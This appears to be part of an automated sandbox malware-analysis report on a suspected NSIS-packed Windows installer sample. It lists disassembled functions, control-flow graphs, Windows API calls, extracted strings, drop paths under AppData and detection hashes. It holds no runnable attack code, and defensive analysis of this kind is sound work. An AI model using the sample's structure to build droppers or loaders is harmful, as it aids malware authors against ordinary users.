                                                • Instruction ID: 2b8d66c2e1a38ac8fa8a62e4dcdff4cf04ad9fa750ea4aef2484392c4ac96c84
                                                • Opcode Fuzzy Hash: d98e6c65d60d857f3aa4eca315e3afb6b45dd94bb5928597cafe6023f70925fc
                                                • Instruction Fuzzy Hash: 3EC1D2B1600200AFDB216F61ED89E2B3A68FB94706F04057EF641B51F1CB799982DB6D
                                                Function 00403990 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 366 403990-4039a8 call 40665c 369 4039aa-4039ba call 4061c9 366->369 370 4039bc-4039f3 call 406150 366->370 379 403a16-403a3f call 403c66 call 405c5b 369->379 375 4039f5-403a06 call 406150 370->375 376 403a0b-403a11 lstrcatW 370->376 375->376 376->379 384 403ad1-403ad9 call 405c5b 379->384 385 403a45-403a4a 379->385 391 403ae7-403b0c LoadImageW 384->391 392 403adb-403ae2 call 4062a4 384->392 385->384 386 403a50-403a78 call 406150 385->386 386->384 393 403a7a-403a7e 386->393 395 403b8d-403b95 call 40140b 391->395 396 403b0e-403b3e RegisterClassW 391->396 392->391 397 403a90-403a9c lstrlenW 393->397 398 403a80-403a8d call 405b80 393->398 410 403b97-403b9a 395->410 411 403b9f-403baa call 403c66 395->411 399 403b44-403b88 SystemParametersInfoW CreateWindowExW 396->399 400 403c5c 396->400 404 403ac4-403acc call 405b53 call 406282 397->404 405 403a9e-403aac lstrcmpiW 397->405 398->397 399->395 403 403c5e-403c65 400->403 404->384 405->404 409 403aae-403ab8 GetFileAttributesW 405->409 414 403aba-403abc 409->414 415 403abe-403abf call 405b9f 409->415 410->403 419 403bb0-403bca ShowWindow call 4065ec 411->419 420 403c33-403c3b call 4053b9 411->420 414->404 414->415 415->404 427 403bd6-403be8 GetClassInfoW 419->427 428 403bcc-403bd1 call 4065ec 419->428 425 403c55-403c57 call 40140b 420->425 426 403c3d-403c43 420->426 425->400 426->410 429 403c49-403c50 call 40140b 426->429 432 403c00-403c23 DialogBoxParamW call 40140b 427->432 433 403bea-403bfa GetClassInfoW RegisterClassW 427->433 428->427 429->410 437 403c28-403c31 call 4038e0 432->437 433->432 437->403
                                                APIs
                                                  • Part of subcall function 0040665C: GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                  • Part of subcall function 0040665C: GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                • lstrcatW.KERNEL32(1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\3507071243740008011.exe",00000000), ref: 00403A11
                                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\pechay\transskribere\jon,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A91
                                                • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\pechay\transskribere\jon,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 00403AA4
                                                • GetFileAttributesW.KERNEL32(Call), ref: 00403AAF
                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\pechay\transskribere\jon), ref: 00403AF8
                                                  • Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6
                                                • RegisterClassW.USER32(00433E80), ref: 00403B35
                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B4D
                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B82
                                                • ShowWindow.USER32(00000005,00000000), ref: 00403BB8
                                                • GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403BE4
                                                • GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403BF1
                                                • RegisterClassW.USER32(00433E80), ref: 00403BFA
                                                • DialogBoxParamW.USER32(?,00000000,00403D3E,00000000), ref: 00403C19
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: "C:\Users\user\Desktop\3507071243740008011.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\pechay\transskribere\jon$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                • API String ID: 1975747703-971695124
                                                • Opcode ID: d13a808758802c6e3fc48dc76d19d1d1e2605ae81d2ad2d57bfa7261d619400b
                                                • Instruction ID: b69a5953a59a380dedfc974e339360e26c19c43312473aa69c5b527d033ca56b
                                                • Opcode Fuzzy Hash: d13a808758802c6e3fc48dc76d19d1d1e2605ae81d2ad2d57bfa7261d619400b
                                                • Instruction Fuzzy Hash: 7061A8312003006ED320BF669D46F673A6CEB84B5AF40053FF945B62E2DB7DA9418A2D
                                                Function 00402EC1 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 440 402ec1-402f0f GetTickCount GetModuleFileNameW call 405d74 443 402f11-402f16 440->443 444 402f1b-402f49 call 406282 call 405b9f call 406282 GetFileSize 440->444 445 4030f3-4030f7 443->445 452 403036-403044 call 402e5d 444->452 453 402f4f 444->453 459 403046-403049 452->459 460 403099-40309e 452->460 455 402f54-402f6b 453->455 457 402f6d 455->457 458 402f6f-402f78 call 403315 455->458 457->458 467 4030a0-4030a8 call 402e5d 458->467 468 402f7e-402f85 458->468 462 40304b-403063 call 40332b call 403315 459->462 463 40306d-403097 GlobalAlloc call 40332b call 4030fa 459->463 460->445 462->460 491 403065-40306b 462->491 463->460 489 4030aa-4030bb 463->489 467->460 469 403001-403005 468->469 470 402f87-402f9b call 405d2f 468->470 477 403007-40300e call 402e5d 469->477 478 40300f-403015 469->478 470->478 487 402f9d-402fa4 470->487 477->478 480 403024-40302e 478->480 481 403017-403021 call 40674f 478->481 480->455 488 403034 480->488 481->480 487->478 493 402fa6-402fad 487->493 488->452 494 4030c3-4030c8 489->494 495 4030bd 489->495 491->460 491->463 493->478 496 402faf-402fb6 493->496 497 4030c9-4030cf 494->497 495->494 496->478 498 402fb8-402fbf 496->498 497->497 499 4030d1-4030ec SetFilePointer call 405d2f 497->499 498->478 500 402fc1-402fe1 498->500 503 4030f1 499->503 500->460 502 402fe7-402feb 500->502 504 402ff3-402ffb 502->504 505 402fed-402ff1 502->505 503->445 504->478 506 402ffd-402fff 504->506 505->488 505->504 506->478
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00402ED2
                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\3507071243740008011.exe,00000400,?,00000006,00000008,0000000A), ref: 00402EEE
                                                  • Part of subcall function 00405D74: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\3507071243740008011.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
                                                  • Part of subcall function 00405D74: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\3507071243740008011.exe,C:\Users\user\Desktop\3507071243740008011.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                • String ID: "C:\Users\user\Desktop\3507071243740008011.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\3507071243740008011.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                • API String ID: 4283519449-3274353692
                                                • Opcode ID: 63e69acdaec1fdaba5d4a89e2a3b5318abe59b2b0843af0c7679ee6c60d0c948
                                                • Instruction ID: 5fb561c1f1da7fe65fe29aa304fda9dad36d264b5387f138e6185790fd874317
                                                • Opcode Fuzzy Hash: 63e69acdaec1fdaba5d4a89e2a3b5318abe59b2b0843af0c7679ee6c60d0c948
                                                • Instruction Fuzzy Hash: 18510471902216AFDB20AF64DD85B9E7EB8FB00359F15403BF904B62C5C7789E408B6C
                                                Function 004062A4 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209stringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 707 4062a4-4062af 708 4062b1-4062c0 707->708 709 4062c2-4062d8 707->709 708->709 710 4064f0-4064f6 709->710 711 4062de-4062eb 709->711 712 4064fc-406507 710->712 713 4062fd-40630a 710->713 711->710 714 4062f1-4062f8 711->714 715 406512-406513 712->715 716 406509-40650d call 406282 712->716 713->712 717 406310-40631c 713->717 714->710 716->715 718 406322-406360 717->718 719 4064dd 717->719 721 406480-406484 718->721 722 406366-406371 718->722 723 4064eb-4064ee 719->723 724 4064df-4064e9 719->724 727 406486-40648c 721->727 728 4064b7-4064bb 721->728 725 406373-406378 722->725 726 40638a 722->726 723->710 724->710 725->726 729 40637a-40637d 725->729 732 406391-406398 726->732 730 40649c-4064a8 call 406282 727->730 731 40648e-40649a call 4061c9 727->731 733 4064ca-4064db lstrlenW 728->733 734 4064bd-4064c5 call 4062a4 728->734 729->726 735 40637f-406382 729->735 745 4064ad-4064b3 730->745 731->745 737 40639a-40639c 732->737 738 40639d-40639f 732->738 733->710 734->733 735->726 741 406384-406388 735->741 737->738 743 4063a1-4063bf call 406150 738->743 744 4063da-4063dd 738->744 741->732 753 4063c4-4063c8 743->753 746 4063ed-4063f0 744->746 747 4063df-4063eb GetSystemDirectoryW 744->747 745->733 749 4064b5 745->749 751 4063f2-406400 GetWindowsDirectoryW 746->751 752 40645b-40645d 746->752 750 40645f-406463 747->750 754 406478-40647e call 406516 749->754 750->754 759 406465 750->759 751->752 752->750 756 406402-40640c 752->756 757 406468-40646b 753->757 758 4063ce-4063d5 call 4062a4 753->758 754->733 762 406426-40643c SHGetSpecialFolderLocation 756->762 763 40640e-406411 756->763 757->754 760 40646d-406473 lstrcatW 757->760 758->750 759->757 760->754 766 406457 762->766 767 40643e-406455 SHGetPathFromIDListW CoTaskMemFree 762->767 763->762 765 406413-40641a 763->765 769 406422-406424 765->769 766->752 767->750 767->766 769->750 769->762
                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063E5
                                                • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,0042C228,?,0040531D,0042C228,00000000), ref: 004063F8
                                                • SHGetSpecialFolderLocation.SHELL32(0040531D,0041D800,00000000,0042C228,?,0040531D,0042C228,00000000), ref: 00406434
                                                • SHGetPathFromIDListW.SHELL32(0041D800,Call), ref: 00406442
                                                • CoTaskMemFree.OLE32(0041D800), ref: 0040644D
                                                • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406473
                                                • lstrlenW.KERNEL32(Call,00000000,0042C228,?,0040531D,0042C228,00000000), ref: 004064CB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                • API String ID: 717251189-1230650788
                                                • Opcode ID: 5757adc76ebd299de9e3f21c9246a654aa3bace2b5e710508428971d5ba8c1fc
                                                • Instruction ID: 2bc9f3e321a063d065e255e84c3e845f89f4622f689527909a28eedc1d3cb15f
                                                • Opcode Fuzzy Hash: 5757adc76ebd299de9e3f21c9246a654aa3bace2b5e710508428971d5ba8c1fc
                                                • Instruction Fuzzy Hash: 1D613631A00205ABDF209F64CD41ABE37A5AF44318F16813FE947B62D1D77C5AA1CB9D
                                                Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 834 40176f-401794 call 402c37 call 405bca 839 401796-40179c call 406282 834->839 840 40179e-4017b0 call 406282 call 405b53 lstrcatW 834->840 845 4017b5-4017b6 call 406516 839->845 840->845 849 4017bb-4017bf 845->849 850 4017c1-4017cb call 4065c5 849->850 851 4017f2-4017f5 849->851 858 4017dd-4017ef 850->858 859 4017cd-4017db CompareFileTime 850->859 853 4017f7-4017f8 call 405d4f 851->853 854 4017fd-401819 call 405d74 851->854 853->854 861 40181b-40181e 854->861 862 40188d-4018b6 call 4052e6 call 4030fa 854->862 858->851 859->858 863 401820-40185e call 406282 * 2 call 4062a4 call 406282 call 4058e4 861->863 864 40186f-401879 call 4052e6 861->864 876 4018b8-4018bc 862->876 877 4018be-4018ca SetFileTime 862->877 863->849 897 401864-401865 863->897 874 401882-401888 864->874 878 402ac8 874->878 876->877 880 4018d0-4018db CloseHandle 876->880 877->880 882 402aca-402ace 878->882 883 4018e1-4018e4 880->883 884 402abf-402ac2 880->884 886 4018e6-4018f7 call 4062a4 lstrcatW 883->886 887 4018f9-4018fc call 4062a4 883->887 884->878 891 401901-4022f6 call 4058e4 886->891 887->891 891->882 897->874 899 401867-401868 897->899 899->864
                                                APIs
                                                • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Ossicular,?,?,00000031), ref: 004017B0
                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Ossicular,?,?,00000031), ref: 004017D5
                                                  • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                  • Part of subcall function 004052E6: lstrlenW.KERNEL32(0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                  • Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                  • Part of subcall function 004052E6: lstrcatW.KERNEL32(0042C228,0040325E,0040325E,0042C228,00000000,0041D800,74DF23A0), ref: 00405341
                                                  • Part of subcall function 004052E6: SetWindowTextW.USER32(0042C228,0042C228), ref: 00405353
                                                  • Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                  • Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                  • Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                • String ID: C:\Users\user\AppData\Local\Temp\nsaD5CD.tmp$C:\Users\user\AppData\Local\Temp\nsaD5CD.tmp\System.dll$C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Ossicular$Call
                                                • API String ID: 1941528284-723589924
                                                • Opcode ID: 5b350da25249687dd4719405322e9856b363981bc1dd38a50fc9a6532880dae0
                                                • Instruction ID: 71989b97474780e21d9e3883d12846d469cfbdfaa42366440e3466e884ca0043
                                                • Opcode Fuzzy Hash: 5b350da25249687dd4719405322e9856b363981bc1dd38a50fc9a6532880dae0
                                                • Instruction Fuzzy Hash: C1419431900518BECF11BBA5DC46DAF3679EF45328F20423FF412B50E1DA3C8A519A6D
                                                Function 004030FA Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 166COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 900 4030fa-403111 901 403113 900->901 902 40311a-403123 900->902 901->902 903 403125 902->903 904 40312c-403131 902->904 903->904 905 403141-40314e call 403315 904->905 906 403133-40313c call 40332b 904->906 910 403303 905->910 911 403154-403158 905->911 906->905 912 403305-403306 910->912 913 4032ae-4032b0 911->913 914 40315e-4031a7 GetTickCount 911->914 917 40330e-403312 912->917 915 4032f0-4032f3 913->915 916 4032b2-4032b5 913->916 918 40330b 914->918 919 4031ad-4031b5 914->919 920 4032f5 915->920 921 4032f8-403301 call 403315 915->921 916->918 922 4032b7 916->922 918->917 923 4031b7 919->923 924 4031ba-4031c8 call 403315 919->924 920->921 921->910 934 403308 921->934 927 4032ba-4032c0 922->927 923->924 924->910 933 4031ce-4031d7 924->933 930 4032c2 927->930 931 4032c4-4032d2 call 403315 927->931 930->931 931->910 937 4032d4-4032e0 call 405e26 931->937 936 4031dd-4031fd call 4067bd 933->936 934->918 942 403203-403216 GetTickCount 936->942 943 4032a6-4032a8 936->943 944 4032e2-4032ec 937->944 945 4032aa-4032ac 937->945 946 403261-403263 942->946 947 403218-403220 942->947 943->912 944->927 948 4032ee 944->948 945->912 951 403265-403269 946->951 952 40329a-40329e 946->952 949 403222-403226 947->949 950 403228-40325e MulDiv wsprintfW call 4052e6 947->950 948->918 949->946 949->950 950->946 955 403280-40328b 951->955 956 40326b-403272 call 405e26 951->956 952->919 953 4032a4 952->953 953->918 958 40328e-403292 955->958 960 403277-403279 956->960 958->936 961 403298 958->961 960->945 962 40327b-40327e 960->962 961->918 962->958
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: CountTick$wsprintf
                                                • String ID: ... %d%%$@
                                                • API String ID: 551687249-3859443358
                                                • Opcode ID: bcadc4b8fcc5a9726af7f1001a2bc5a9f2fe7a461361550fb019878be66ece88
                                                • Instruction ID: f75c430432033e5046526aed0a4a2f939c591a2e87bafbbe4e5c1659d7ec9983
                                                • Opcode Fuzzy Hash: bcadc4b8fcc5a9726af7f1001a2bc5a9f2fe7a461361550fb019878be66ece88
                                                • Instruction Fuzzy Hash: 85515A71900219EBDB10CF69DA84B9E7FA8AF45366F14417BEC14B72C0C778DA50CBA9
                                                Function 00402644 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 963 402644-40265d call 402c15 966 402663-40266a 963->966 967 402abf-402ac2 963->967 968 40266c 966->968 969 40266f-402672 966->969 970 402ac8-402ace 967->970 968->969 971 4027d6-4027de 969->971 972 402678-402687 call 4061e2 969->972 971->967 972->971 976 40268d 972->976 977 402693-402697 976->977 978 40272c-40272f 977->978 979 40269d-4026b8 ReadFile 977->979 980 402731-402734 978->980 981 402747-402757 call 405df7 978->981 979->971 982 4026be-4026c3 979->982 980->981 983 402736-402741 call 405e55 980->983 981->971 991 402759 981->991 982->971 985 4026c9-4026d7 982->985 983->971 983->981 988 402792-40279e call 4061c9 985->988 989 4026dd-4026ef MultiByteToWideChar 985->989 988->970 989->991 992 4026f1-4026f4 989->992 995 40275c-40275f 991->995 996 4026f6-402701 992->996 995->988 997 402761-402766 995->997 996->995 998 402703-402728 SetFilePointer MultiByteToWideChar 996->998 999 4027a3-4027a7 997->999 1000 402768-40276d 997->1000 998->996 1001 40272a 998->1001 1002 4027c4-4027d0 SetFilePointer 999->1002 1003 4027a9-4027ad 999->1003 1000->999 1004 40276f-402782 1000->1004 1001->991 1002->971 1005 4027b5-4027c2 1003->1005 1006 4027af-4027b3 1003->1006 1004->971 1007 402784-40278a 1004->1007 1005->971 1006->1002 1006->1005 1007->977 1008 402790 1007->1008 1008->971
                                                APIs
                                                • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B0
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026EB
                                                • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040270E
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402724
                                                  • Part of subcall function 00405E55: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E6B
                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                • String ID: 9
                                                • API String ID: 163830602-2366072709
                                                • Opcode ID: 0f6749e0356039c80119e9da3c7509a60750b74a106ccf27ce207c31930fcb0b
                                                • Instruction ID: 4c47c5b6e7001fd487639b42c981b506dedcea616f9f6d447a3608767ea6fa5a
                                                • Opcode Fuzzy Hash: 0f6749e0356039c80119e9da3c7509a60750b74a106ccf27ce207c31930fcb0b
                                                • Instruction Fuzzy Hash: 8351E575D1021AABDF20DFA5DA88AAEB779FF04304F50443BE511B72D0D7B899828B58
                                                Function 004065EC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1009 4065ec-40660c GetSystemDirectoryW 1010 406610-406612 1009->1010 1011 40660e 1009->1011 1012 406623-406625 1010->1012 1013 406614-40661d 1010->1013 1011->1010 1015 406626-406659 wsprintfW LoadLibraryExW 1012->1015 1013->1012 1014 40661f-406621 1013->1014 1014->1015
                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406603
                                                • wsprintfW.USER32 ref: 0040663E
                                                • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406652
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                • String ID: %s%S.dll$UXTHEME$\
                                                • API String ID: 2200240437-1946221925
